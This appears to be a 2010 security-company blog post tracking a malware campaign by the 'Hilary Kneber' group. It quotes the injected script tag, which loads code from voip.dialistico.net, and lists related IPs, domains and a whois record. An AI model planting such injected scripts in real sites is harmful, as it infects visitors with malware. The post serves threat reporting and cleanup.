Hilary Kneber at it again: voip.dialistico.net

The Hilary Kneber group is at it again. We are now tracking their usage of voip.dialistico.net to push malware to quite a few sites. If you don’t know about them, just take a look at our blog history. Most of the mass attacks we posted were controlled and created by them.

All the infected sites have this malware:

<script src="http://voip.dialistico.net/products/voip.php”..

Which is generated by a large string of encoded PHP added to all files in a site. If your site got hacked, we have a clean up solution here: https://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html. Some details here too: MW:GDD:3.

The above code loads malware from www4.pc-guard-soft6.net, which is hosted at 69.57.173.221 (from unique-protection.com – famous fake AV site).

And the whois for dialistico.net:

Domain name: dialistico.net
Registrant Contact:
HardSoft, inc
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

Administrative Contact:
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

This IP is hosted 77.78.239.53, which was also the home of recent attacks:

myblindstudioinfoonline.com
meqashoppercom.com
insomniaboldinfocom.com
voip.dialistico.net

We will post more details when we get them.

Is your site hacked? Visit http://sucuri.net and we will clean up the mess for you.